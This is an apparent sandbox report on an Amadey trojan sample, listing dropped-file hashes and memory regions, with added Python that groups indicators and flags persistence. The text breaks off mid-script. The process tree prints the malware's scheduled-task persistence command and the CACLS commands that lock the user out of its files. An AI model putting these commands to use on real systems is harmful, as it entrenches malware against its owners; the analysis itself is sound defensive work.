C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe

MD5 768200a76def472e675539094047bed9
SHA1 24bc17689541656a8a12902c7f19bd991193ca50
SHA256 79ff7ea339f95a557cec5e39d944118af6c105c29736e448d5aad60368eae5af
SHA512 143cfc563ebd3f57192adc4484ba0b4b246c4b63d3f10b0e90e83ea841ea83488636233eb58a8217fd1a9dd825075f28e0b1f858bc9e4a5fd5abb6e0712fabbb

memory/1272-137-0x0000000000130000-0x0000000000BD1000-memory.dmp

\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe

MD5 f8f7c8c4cc25ba49c5b591aab8bfdc04
SHA1 6ed43db5ba58257c1283abfa8a08290ccf896033
SHA256 67cd8472366ecda8a195fc8a44e4747429f8d2e6d8c16d0c15a0e5a500506feb
SHA512 6e7fbd61fdf4cdcfed8f78a4d2272bb204bbd579cec94c4a45569bef9c5c62be22117545030a91291cae0cee6dea7454ab57fa16907d26d9a39cd7275bdbb9b5

\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe

MD5 f8f7c8c4cc25ba49c5b591aab8bfdc04
SHA1 6ed43db5ba58257c1283abfa8a08290ccf896033
SHA256 67cd8472366ecda8a195fc8a44e4747429f8d2e6d8c16d0c15a0e5a500506feb
SHA512 6e7fbd61fdf4cdcfed8f78a4d2272bb204bbd579cec94c4a45569bef9c5c62be22117545030a91291cae0cee6dea7454ab57fa16907d26d9a39cd7275bdbb9b5

\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe

MD5 768200a76def472e675539094047bed9
SHA1 24bc17689541656a8a12902c7f19bd991193ca50
SHA256 79ff7ea339f95a557cec5e39d944118af6c105c29736e448d5aad60368eae5af
SHA512 143cfc563ebd3f57192adc4484ba0b4b246c4b63d3f10b0e90e83ea841ea83488636233eb58a8217fd1a9dd825075f28e0b1f858bc9e4a5fd5abb6e0712fabbb

C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe

MD5 768200a76def472e675539094047bed9
SHA1 24bc17689541656a8a12902c7f19bd991193ca50
SHA256 79ff7ea339f95a557cec5e39d944118af6c105c29736e448d5aad60368eae5af
SHA512 143cfc563ebd3f57192adc4484ba0b4b246c4b63d3f10b0e90e83ea841ea83488636233eb58a8217fd1a9dd825075f28e0b1f858bc9e4a5fd5abb6e0712fabbb

memory/1272-143-0x0000000004650000-0x000000000549A000-memory.dmp

memory/1892-144-0x0000000077A40000-0x0000000077BE9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe

MD5 3258deefff3ca70f3dfa3e67067ca611
SHA1 a28ec103c22b03f381dd72073cf620b11881b7b7
SHA256 11c3e7a62b3e78c6ec720aea618bf0a3854ad42535f888532c3e206f3724db4c
SHA512 541eec13adbb3afcc6ee0cfea2d1ddd71036a0da9be5fe6919a2becca5dc23089754d2e5bfd15886cd8e3981f982e40d28bb467132cfdf04844d930ca612b3b8

memory/1892-155-0x000000013F610000-0x000000014045A000-memory.dmp

memory/1892-154-0x000000013F610000-0x000000014045A000-memory.dmp

memory/1892-157-0x000000013F610000-0x000000014045A000-memory.dmp

memory/1892-158-0x000000013F610000-0x000000014045A000-memory.dmp

memory/1892-159-0x000000013F610000-0x000000014045A000-memory.dmp

memory/1892-160-0x000000013F610000-0x000000014045A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe

MD5 3258deefff3ca70f3dfa3e67067ca611
SHA1 a28ec103c22b03f381dd72073cf620b11881b7b7
SHA256 11c3e7a62b3e78c6ec720aea618bf0a3854ad42535f888532c3e206f3724db4c
SHA512 541eec13adbb3afcc6ee0cfea2d1ddd71036a0da9be5fe6919a2becca5dc23089754d2e5bfd15886cd8e3981f982e40d28bb467132cfdf04844d930ca612b3b8

\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe

MD5 3258deefff3ca70f3dfa3e67067ca611
SHA1 a28ec103c22b03f381dd72073cf620b11881b7b7
SHA256 11c3e7a62b3e78c6ec720aea618bf0a3854ad42535f888532c3e206f3724db4c
SHA512 541eec13adbb3afcc6ee0cfea2d1ddd71036a0da9be5fe6919a2becca5dc23089754d2e5bfd15886cd8e3981f982e40d28bb467132cfdf04844d930ca612b3b8

memory/1272-165-0x00000000044F0000-0x0000000004E33000-memory.dmp

memory/3024-166-0x0000000000030000-0x0000000000973000-memory.dmp

memory/1892-164-0x000000013F610000-0x000000014045A000-memory.dmp

\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe

MD5 f8f7c8c4cc25ba49c5b591aab8bfdc04
SHA1 6ed43db5ba58257c1283abfa8a08290ccf896033
SHA256 67cd8472366ecda8a195fc8a44e4747429f8d2e6d8c16d0c15a0e5a500506feb
SHA512 6e7fbd61fdf4cdcfed8f78a4d2272bb204bbd579cec94c4a45569bef9c5c62be22117545030a91291cae0cee6dea7454ab57fa16907d26d9a39cd7275bdbb9b5

memory/2044-168-0x0000000073940000-0x000000007402E000-memory.dmp

memory/3024-169-0x0000000077A40000-0x0000000077BE9000-memory.dmp

memory/3024-170-0x0000000000030000-0x0000000000973000-memory.dmp

memory/3024-171-0x0000000000030000-0x0000000000973000-memory.dmp

memory/3024-172-0x0000000000030000-0x0000000000973000-memory.dmp

memory/3024-173-0x0000000000030000-0x0000000000973000-memory.dmp

memory/3024-174-0x0000000000030000-0x0000000000973000-memory.dmp

memory/3024-175-0x0000000000030000-0x0000000000973000-memory.dmp

memory/3024-176-0x0000000000030000-0x0000000000973000-memory.dmp

memory/3024-177-0x0000000000030000-0x0000000000973000-memory.dmp

memory/3024-178-0x0000000000030000-0x0000000000973000-memory.dmp

memory/1272-179-0x0000000004650000-0x000000000549A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe

MD5 3258deefff3ca70f3dfa3e67067ca611
SHA1 a28ec103c22b03f381dd72073cf620b11881b7b7
SHA256 11c3e7a62b3e78c6ec720aea618bf0a3854ad42535f888532c3e206f3724db4c
SHA512 541eec13adbb3afcc6ee0cfea2d1ddd71036a0da9be5fe6919a2becca5dc23089754d2e5bfd15886cd8e3981f982e40d28bb467132cfdf04844d930ca612b3b8

memory/3024-181-0x0000000000030000-0x0000000000973000-memory.dmp

memory/1892-182-0x0000000077A40000-0x0000000077BE9000-memory.dmp

memory/1892-183-0x000000013F610000-0x000000014045A000-memory.dmp

memory/2044-185-0x0000000007490000-0x00000000074D0000-memory.dmp

memory/3024-186-0x0000000000030000-0x0000000000973000-memory.dmp

memory/3024-187-0x0000000000030000-0x0000000000973000-memory.dmp

memory/2044-188-0x0000000073940000-0x000000007402E000-memory.dmp

memory/3024-189-0x0000000077A40000-0x0000000077BE9000-memory.dmp

memory/3024-190-0x0000000000030000-0x0000000000973000-memory.dmp

memory/1892-195-0x000000013F610000-0x000000014045A000-memory.dmp

memory/3040-196-0x000007FEF5E50000-0x000007FEF67ED000-memory.dmp

memory/3040-197-0x0000000002870000-0x00000000028F0000-memory.dmp

memory/2044-199-0x0000000007490000-0x00000000074D0000-memory.dmp

memory/3040-198-0x0000000002870000-0x00000000028F0000-memory.dmp

memory/3024-200-0x0000000000030000-0x0000000000973000-memory.dmp

memory/3040-201-0x000000001B2B0000-0x000000001B592000-memory.dmp

memory/3040-202-0x0000000002430000-0x0000000002438000-memory.dmp

memory/3040-204-0x0000000002870000-0x00000000028F0000-memory.dmp

\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

MD5 c3944a1e56f3c41bd7957fe045472ce8
SHA1 ad17123ad2b3f4d9a516c93b88d42930c047bb85
SHA256 e27f51358d373b0b6cdf3e32f38bf3c836113fdbde4756ea26d0a4d1f4e101fb
SHA512 323bb4670d7dc3ef3b354cc724f9538dd683f221310ee96c78f01fc4680bade3c7628711af5ba0ff03c1584fc7cb5363f10faef9c8578e0bb632dc8d1657d057

C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

MD5 3de8733baaf72b71b2dc206361d57d49
SHA1 e56011ae28e2bc957f1b96537b478f221f68b06d
SHA256 8be2829f835bc11d2c6e9953cfaa7c4c216e307a34a3c7e64bb8a785748e18f6
SHA512 355d9b748a7720aa8ca5b73d116af9849f395786ca71af2d44d183da1df51022ad02aaa49f1f2cdd5cc2bff664fcc8d33a3258ad91afd8f4d6ef2b56f5827196

memory/1688-209-0x0000000000E20000-0x0000000001763000-memory.dmp

memory/3024-208-0x0000000000030000-0x0000000000973000-memory.dmp

memory/1688-210-0x0000000077A40000-0x0000000077BE9000-memory.dmp

memory/3024-211-0x0000000077A40000-0x0000000077BE9000-memory.dmp

memory/3040-213-0x000007FEF5E50000-0x000007FEF67ED000-memory.dmp

memory/1688-212-0x0000000000E20000-0x0000000001763000-memory.dmp

memory/1688-214-0x0000000000E20000-0x0000000001763000-memory.dmp

memory/1688-215-0x0000000000E20000-0x0000000001763000-memory.dmp

memory/1688-216-0x0000000000E20000-0x0000000001763000-memory.dmp

memory/1688-217-0x0000000000E20000-0x0000000001763000-memory.dmp

memory/1688-218-0x0000000000E20000-0x0000000001763000-memory.dmp

memory/1688-219-0x0000000000E20000-0x0000000001763000-memory.dmp

memory/1688-220-0x0000000000E20000-0x0000000001763000-memory.dmp

memory/1688-221-0x0000000000E20000-0x0000000001763000-memory.dmp

memory/1892-222-0x000000013F610000-0x000000014045A000-memory.dmp

memory/1688-223-0x0000000000E20000-0x0000000001763000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

MD5 89e9bc7a5d97370a0f4a35041a54a696
SHA1 c0e8572f48b2e5f83c39374f4175e35a5e7c2029
SHA256 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847
SHA512 12100def3ac697a0fce815a3be2e41bb62f47f8a60b273c3cf367096c231c86110903322d8f351d8609f7f5f72f5aaf45d6539e09972c54221697820ece570f2

memory/2512-225-0x0000000000130000-0x0000000000BD1000-memory.dmp

memory/1688-226-0x0000000000E20000-0x0000000001763000-memory.dmp

memory/2512-232-0x0000000077C40000-0x0000000077C41000-memory.dmp

memory/1688-233-0x0000000077A40000-0x0000000077BE9000-memory.dmp

memory/2512-234-0x0000000000100000-0x0000000000101000-memory.dmp

memory/2512-236-0x0000000000130000-0x0000000000BD1000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VD1AX5WJEHO2R5CIPBWT.temp

MD5 96aacfb1cbe0eb8dfff965c5d20ffbd6
SHA1 8c78cb2281006312b51327a4355f3348993caf52
SHA256 98c921d4d4f9cad2da010a2da17b2488cb244ba06f0d04f2181256f1afee3e19
SHA512 d8794e98f7d67ac27adc09cef3bad97a9afd3143269ff6a96718d4e9ef7130a97fae23abb7f4bc26a13a6ecd8d98a32cc817e016e6ac589a68de4d1644a5185e

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 96aacfb1cbe0eb8dfff965c5d20ffbd6
SHA1 8c78cb2281006312b51327a4355f3348993caf52
SHA256 98c921d4d4f9cad2da010a2da17b2488cb244ba06f0d04f2181256f1afee3e19
SHA512 d8794e98f7d67ac27adc09cef3bad97a9afd3143269ff6a96718d4e9ef7130a97fae23abb7f4bc26a13a6ecd8d98a32cc817e016e6ac589a68de4d1644a5185e

memory/2380-244-0x000000001B240000-0x000000001B522000-memory.dmp

memory/1688-237-0x0000000000E20000-0x0000000001763000-memory.dmp

memory/2380-246-0x000007FEF54B0000-0x000007FEF5E4D000-memory.dmp

memory/2380-247-0x00000000027D0000-0x0000000002850000-memory.dmp

memory/2380-245-0x0000000001E30000-0x0000000001E38000-memory.dmp

memory/2380-249-0x00000000027D0000-0x0000000002850000-memory.dmp

memory/2380-250-0x00000000027D0000-0x0000000002850000-memory.dmp

memory/2380-248-0x000007FEF54B0000-0x000007FEF5E4D000-memory.dmp

memory/1688-252-0x0000000000E20000-0x0000000001763000-memory.dmp

memory/2380-253-0x00000000027D0000-0x0000000002850000-memory.dmp

memory/2512-254-0x0000000000130000-0x0000000000BD1000-memory.dmp

memory/2380-255-0x000007FEF54B0000-0x000007FEF5E4D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe

MD5 768200a76def472e675539094047bed9
SHA1 24bc17689541656a8a12902c7f19bd991193ca50
SHA256 79ff7ea339f95a557cec5e39d944118af6c105c29736e448d5aad60368eae5af
SHA512 143cfc563ebd3f57192adc4484ba0b4b246c4b63d3f10b0e90e83ea841ea83488636233eb58a8217fd1a9dd825075f28e0b1f858bc9e4a5fd5abb6e0712fabbb

memory/1892-259-0x000000013F610000-0x000000014045A000-memory.dmp

memory/1892-260-0x0000000077A40000-0x0000000077BE9000-memory.dmp

\Program Files\Google\Chrome\updater.exe

MD5 768200a76def472e675539094047bed9
SHA1 24bc17689541656a8a12902c7f19bd991193ca50
SHA256 79ff7ea339f95a557cec5e39d944118af6c105c29736e448d5aad60368eae5af
SHA512 143cfc563ebd3f57192adc4484ba0b4b246c4b63d3f10b0e90e83ea841ea83488636233eb58a8217fd1a9dd825075f28e0b1f858bc9e4a5fd5abb6e0712fabbb

memory/2792-263-0x000000013F740000-0x000000014058A000-memory.dmp

C:\Program Files\Google\Chrome\updater.exe

MD5 768200a76def472e675539094047bed9
SHA1 24bc17689541656a8a12902c7f19bd991193ca50
SHA256 79ff7ea339f95a557cec5e39d944118af6c105c29736e448d5aad60368eae5af
SHA512 143cfc563ebd3f57192adc4484ba0b4b246c4b63d3f10b0e90e83ea841ea83488636233eb58a8217fd1a9dd825075f28e0b1f858bc9e4a5fd5abb6e0712fabbb

memory/2952-266-0x0000000077A40000-0x0000000077BE9000-memory.dmp

memory/2952-275-0x000000013F740000-0x000000014058A000-memory.dmp

memory/2952-276-0x0000000077A40000-0x0000000077BE9000-memory.dmp

memory/2720-279-0x0000000019BB0000-0x0000000019E92000-memory.dmp

memory/2720-281-0x0000000000AA0000-0x0000000000AA8000-memory.dmp

memory/2720-280-0x000007FEF5E50000-0x000007FEF67ED000-memory.dmp

C:\Windows\System32\drivers\etc\hosts

MD5 3e9af076957c5b2f9c9ce5ec994bea05
SHA1 a8c7326f6bceffaeed1c2bb8d7165e56497965fe
SHA256 e332ebfed27e0bb08b84dfda05acc7f0fa1b6281678e0120c5b7c893a75df47e
SHA512 933ba0d69e7b78537348c0dc1bf83fb069f98bb93d31c638dc79c4a48d12d879c474bd61e3cbde44622baef5e20fb92ebf16c66128672e4a6d4ee20afbf9d01f

C:\Program Files\Google\Chrome\updater.exe

MD5 768200a76def472e675539094047bed9
SHA1 24bc17689541656a8a12902c7f19bd991193ca50
SHA256 79ff7ea339f95a557cec5e39d944118af6c105c29736e448d5aad60368eae5af
SHA512 143cfc563ebd3f57192adc4484ba0b4b246c4b63d3f10b0e90e83ea841ea83488636233eb58a8217fd1a9dd825075f28e0b1f858bc9e4a5fd5abb6e0712fabbb

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

MD5 89e9bc7a5d97370a0f4a35041a54a696
SHA1 c0e8572f48b2e5f83c39374f4175e35a5e7c2029
SHA256 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847
SHA512 12100def3ac697a0fce815a3be2e41bb62f47f8a60b273c3cf367096c231c86110903322d8f351d8609f7f5f72f5aaf45d6539e09972c54221697820ece570f2
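The Files listings above record the same content under several paths: the submitted sample's SHA256 reappears as Temp\eb0f58bce7\oneetx.exe (the dropper staging a copy of itself), and rdpcllp.exe in Temp\1000128101 carries exactly the hashes of the updater.exe written under Program Files\Google\Chrome. Spotting that by eye across hundreds of entries is error-prone, so the following Python is an added example, not part of the sandbox report, that parses entries in the report's own plain-text layout (a path line followed by MD5/SHA1/SHA256/SHA512 lines; memory/...-memory.dmp lines are dump regions, not files on disk) and groups them by SHA256. The excerpt embedded in the script is a constructed subset of the entries on this page; treating the drive-less "\Program Files\..." form as the system drive is my assumption.

```python
import re
from collections import defaultdict

# Constructed excerpt: a subset of this report's "Files" entries, embedded so the
# script runs offline (SHA512 lines omitted to keep the sample short).
SAMPLE_SHA256 = "9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847"
FILES_EXCERPT = r"""
memory/3024-178-0x0000000000030000-0x0000000000973000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe

MD5 3258deefff3ca70f3dfa3e67067ca611
SHA1 a28ec103c22b03f381dd72073cf620b11881b7b7
SHA256 11c3e7a62b3e78c6ec720aea618bf0a3854ad42535f888532c3e206f3724db4c

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

MD5 89e9bc7a5d97370a0f4a35041a54a696
SHA1 c0e8572f48b2e5f83c39374f4175e35a5e7c2029
SHA256 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847

memory/1688-209-0x0000000000E20000-0x0000000001763000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe

MD5 768200a76def472e675539094047bed9
SHA1 24bc17689541656a8a12902c7f19bd991193ca50
SHA256 79ff7ea339f95a557cec5e39d944118af6c105c29736e448d5aad60368eae5af

\Program Files\Google\Chrome\updater.exe

MD5 768200a76def472e675539094047bed9
SHA1 24bc17689541656a8a12902c7f19bd991193ca50
SHA256 79ff7ea339f95a557cec5e39d944118af6c105c29736e448d5aad60368eae5af

C:\Program Files\Google\Chrome\updater.exe

MD5 768200a76def472e675539094047bed9
SHA1 24bc17689541656a8a12902c7f19bd991193ca50
SHA256 79ff7ea339f95a557cec5e39d944118af6c105c29736e448d5aad60368eae5af

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

MD5 89e9bc7a5d97370a0f4a35041a54a696
SHA1 c0e8572f48b2e5f83c39374f4175e35a5e7c2029
SHA256 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847
"""

HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9a-fA-F]+)$")
PATH_RE = re.compile(r"^(?:[A-Za-z]:)?\\")   # "C:\..." or drive-less "\..."


def normalise_path(path):
    """The report lists some files both as C:\\... and as \\...; assume the
    drive-less form refers to the system drive (my assumption: C:)."""
    return "C:" + path if path.startswith("\\") else path


def parse_file_entries(text):
    """Return [(path, {algo: hexdigest}), ...] for each dropped-file entry.
    Hash lines attach to the most recent path line; a memory/...-memory.dmp
    line is a process dump region, not a file, and ends the current entry."""
    entries, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue                      # blank lines separate path and hashes
        if line.startswith("memory/"):
            current = None
            continue
        m = HASH_RE.match(line)
        if m and current is not None:
            current[1][m.group(1)] = m.group(2).lower()
        elif PATH_RE.match(line):
            current = (normalise_path(line), {})
            entries.append(current)
    return entries


def group_by_sha256(entries):
    """SHA256 -> sorted list of distinct paths that carried that content."""
    groups = defaultdict(set)
    for path, hashes in entries:
        if "SHA256" in hashes:
            groups[hashes["SHA256"]].add(path)
    return {h: sorted(paths) for h, paths in groups.items()}


def self_copies(groups, sample_sha256):
    """Paths byte-identical to the submitted sample: the dropper staging itself."""
    return groups.get(sample_sha256.lower(), [])


def relocated_payloads(groups):
    """Content written under more than one path, e.g. a Temp staging name and a
    vendor-looking destination such as Program Files\\Google\\Chrome\\updater.exe."""
    return {h: paths for h, paths in groups.items() if len(paths) > 1}


def iocs(entries):
    """Deduplicated SHA256 list for blocking or hunting."""
    return sorted({h["SHA256"] for _, h in entries if "SHA256" in h})


if __name__ == "__main__":
    groups = group_by_sha256(parse_file_entries(FILES_EXCERPT))
    print("self-copies of sample:", self_copies(groups, SAMPLE_SHA256))
    for h, paths in relocated_payloads(groups).items():
        print("same content under several paths", h[:12], paths)
```

The grouping is keyed on SHA256 alone because the report always supplies it; MD5 and SHA1 are kept in each entry only so the output can feed blocklists that still want them.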

Analysis: behavioral2

Detonation Overview

Submitted

2023-08-01 23:46

Reported

2023-08-01 23:48

Platform

win10v2004-20230703-en

Max time kernel

147s

Max time network

143s

Command Line

"C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df6.exe"

Signatures

Amadey

trojan amadey

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df6.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1372 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df6.exe C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
PID 1372 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df6.exe C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
PID 1372 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df6.exe C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
PID 2756 wrote to memory of 1164 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 2756 wrote to memory of 1164 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 2756 wrote to memory of 1164 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 2756 wrote to memory of 3468 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 3468 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 3468 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Windows\SysWOW64\cmd.exe
PID 3468 wrote to memory of 884 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3468 wrote to memory of 884 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3468 wrote to memory of 884 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3468 wrote to memory of 4836 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3468 wrote to memory of 4836 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3468 wrote to memory of 4836 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3468 wrote to memory of 4644 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3468 wrote to memory of 4644 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3468 wrote to memory of 4644 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3468 wrote to memory of 560 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3468 wrote to memory of 560 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3468 wrote to memory of 560 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3468 wrote to memory of 1380 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3468 wrote to memory of 1380 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3468 wrote to memory of 1380 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3468 wrote to memory of 8 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3468 wrote to memory of 8 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3468 wrote to memory of 8 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe

Processes

C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df6.exe

"C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df6.exe"

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

"C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\eb0f58bce7" /P "Admin:N"&&CACLS "..\eb0f58bce7" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "oneetx.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "oneetx.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cacls.exe

CACLS "..\eb0f58bce7" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\eb0f58bce7" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
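The process tree above shows the two steps Amadey takes to stay resident and resist removal: a scheduled task that relaunches the staged copy every minute (/SC MINUTE /MO 1, action pointing into the user's Temp directory), and a cmd.exe chain that first replaces the ACL on the dropper and its directory so the logged-on user has no access at all (CACLS ... /P "Admin:N", with "echo Y|" piped in to answer the "Are you sure (Y/N)?" prompt) and then adds read-only back (/P "Admin:R" /E). The Python below is an added example, not part of the sandbox report: it tokenises the command lines listed above (embedded as constructed literals), parses the schtasks and cacls switches, and flags a minute-interval task whose action lives in a user-writable directory together with any deny-all ACL edit. The list of user-writable path markers and the wording of the findings are my own choices.

```python
import re

# Constructed sample: the command lines from the behavioral2 process tree above,
# copied here as string literals so the script runs offline.
PROCESS_CMDLINES = [
    r'"C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df6.exe"',
    r'"C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe"',
    r'"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe" /F',
    r'"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\eb0f58bce7" /P "Admin:N"&&CACLS "..\eb0f58bce7" /P "Admin:R" /E&&Exit',
    r'C:\Windows\system32\cmd.exe /S /D /c" echo Y"',
    r'CACLS "oneetx.exe" /P "Admin:N"',
    r'CACLS "oneetx.exe" /P "Admin:R" /E',
    r'CACLS "..\eb0f58bce7" /P "Admin:N"',
    r'CACLS "..\eb0f58bce7" /P "Admin:R" /E',
]

# Directories an unprivileged user can write to (my own list, not from the report);
# a scheduled task whose action lives here is the persistence pattern to flag.
USER_WRITABLE = ("\\appdata\\local\\temp\\", "\\appdata\\roaming\\",
                 "\\users\\public\\", "\\programdata\\")

TOKEN_RE = re.compile(r'"([^"]*)"|(\S+)')
CMD_PREFIX_RE = re.compile(r'\s*"?[^"]*cmd\.exe"?\s+/[kc]\s+', re.IGNORECASE)


def tokenize(cmdline):
    """Split on whitespace, keeping quoted arguments whole (quotes removed)."""
    return [quoted or bare for quoted, bare in TOKEN_RE.findall(cmdline)]


def parse_switches(tokens):
    """{SWITCH: value} for /X value pairs, {SWITCH: True} for bare flags like /F or /E.
    tokens[0] is the program and is skipped."""
    opts, i = {}, 1
    while i < len(tokens):
        tok = tokens[i]
        if tok.startswith("/"):
            key = tok[1:].upper()
            if i + 1 < len(tokens) and not tokens[i + 1].startswith("/"):
                opts[key] = tokens[i + 1]
                i += 2
                continue
            opts[key] = True
        i += 1
    return opts


def split_chain(cmdline):
    """Reduce a cmd.exe /k or /c chain to its member commands: drop the cmd.exe prefix,
    split on '&&', discard 'echo Y|' pipes and a trailing Exit. Other lines pass through."""
    m = CMD_PREFIX_RE.match(cmdline)
    body = cmdline[m.end():] if m else cmdline
    parts = []
    for piece in body.split("&&"):
        piece = piece.rsplit("|", 1)[-1].strip()
        if piece and piece.lower() != "exit":
            parts.append(piece)
    return parts


def schtasks_finding(tokens):
    """Flag 'schtasks /Create /SC MINUTE' whose /TR action sits in a user-writable path."""
    if not tokens[0].lower().endswith("schtasks.exe"):
        return None
    o = parse_switches(tokens)
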